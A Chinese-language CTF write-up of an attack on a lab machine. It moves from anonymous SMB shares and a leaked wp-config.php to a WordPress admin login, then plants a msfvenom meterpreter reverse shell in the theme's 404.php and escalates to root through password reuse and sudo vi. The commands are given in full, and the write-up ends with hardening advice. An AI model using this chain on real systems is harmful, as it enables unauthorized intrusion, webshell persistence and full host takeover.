从SMB信息泄露到WordPress渗透:一个完整的CTF靶机攻防演练记录
从SMB信息泄露到WordPress渗透:一个完整的CTF靶机攻防演练记录
在网络安全领域,CTF(Capture The Flag)比赛是检验实战能力的重要方式。本文将详细记录一次完整的靶机渗透过程,从SMB信息泄露入手,逐步深入WordPress系统,最终获取系统权限。整个过程不仅展示了常见漏洞的利用方法,更体现了渗透测试中信息收集、漏洞分析和权限提升的完整思路。
1. 环境准备与信息收集
任何渗透测试的第一步都是充分了解目标系统。我们使用Kali Linux作为攻击机,靶机运行在VirtualBox环境中,网络配置为桥接模式。
1.1 网络探测
首先需要确定靶机的IP地址。在Kali终端中执行:
netdiscover -r 192.168.43.0/24发现靶机IP为192.168.43.232。接下来使用nmap进行详细扫描:
nmap -A -v -T4 192.168.43.232扫描结果显示开放了以下关键端口:
| 端口 | 服务 | 可能用途 |
|---|---|---|
| 22 | SSH | 远程管理 |
| 80 | HTTP | Web服务 |
| 139 | NetBIOS | SMB文件共享 |
| 445 | SMB | 文件共享 |
| 3306 | MySQL | 数据库 |
提示:全面扫描时建议同时使用
-sV参数获取服务版本信息,这对后续漏洞利用至关重要。
2. SMB服务信息泄露利用
SMB(Server Message Block)协议是Windows网络中常用的文件共享协议,但配置不当常导致信息泄露。
2.1 SMB匿名访问检查
使用smbclient检查是否允许匿名访问:
smbclient -L //192.168.43.232当提示输入密码时直接回车,成功列出共享资源:
- IPC$
- share
- wordpress
2.2 敏感文件获取
进一步检查share共享:
smbclient //192.168.43.232/share发现两个关键文件:
- deets.txt - 包含简单密码"12345"
- wordpress目录 - 可能包含网站配置文件
下载并检查wp-config.php文件:
get wp-config.php该文件泄露了WordPress数据库凭据:
- 用户名:wp_user
- 密码:w0rdpr3ss@123
注意:实际环境中,这种配置文件泄露可能直接导致整个网站沦陷。
3. WordPress渗透实战
获得数据库凭据后,我们转向Web渗透。
3.1 后台登录尝试
访问http://192.168.43.232/wordpress/wp-admin,尝试使用以下组合:
- admin/12345
- wp_user/w0rdpr3ss@123
第二种组合成功登录后台,获得了管理员权限。
3.2 WebShell上传与利用
在WordPress中,有几种常见方式上传WebShell:
- 通过主题编辑器修改404.php
- 通过媒体库上传恶意文件
- 通过插件上传功能
我们选择修改主题文件的方式:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.96 LPORT=4444 -f raw > shell.php将生成的PHP代码插入到当前主题的404.php文件中。同时在Kali上启动监听:
msfconsole use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST 192.168.43.96 set LPORT 4444 run访问http://192.168.43.232/wordpress/wp-content/themes/twentyfifteen/404.php成功获取反向shell。
4. 权限提升与最终突破
获得初始shell后,通常权限较低,需要进一步提权。
4.1 系统信息收集
在获得的shell中执行:
whoami uname -a cat /etc/passwd发现系统运行在Linux上,当前用户为www-data,存在多个普通用户账户。
4.2 密码重用尝试
使用之前获得的密码尝试切换用户:
su - user1 密码:12345成功提升为user1权限。检查sudo权限:
sudo -l发现user1可以无密码执行/usr/bin/vi,利用此特性获取root权限:
sudo vi /etc/passwd :!bash最终获得root权限,在/root目录下找到flag文件,完成整个渗透过程。
5. 安全防护建议
通过这次演练,我们可以总结出几点关键防护措施:
SMB服务安全:
- 禁用匿名访问
- 设置强密码策略
- 限制可访问的IP范围
WordPress安全:
- 使用独特的管理员用户名
- 定期更新核心和插件
- 限制后台登录尝试次数
系统层面防护:
- 定期检查文件权限
- 监控异常登录行为
- 实施最小权限原则
在实际渗透测试中,每个步骤都可能遇到各种障碍,需要测试者具备灵活变通的能力。从信息收集到最终突破,整个过程体现了"攻击链"的概念,也说明了安全防护需要全面、多层次的防御策略。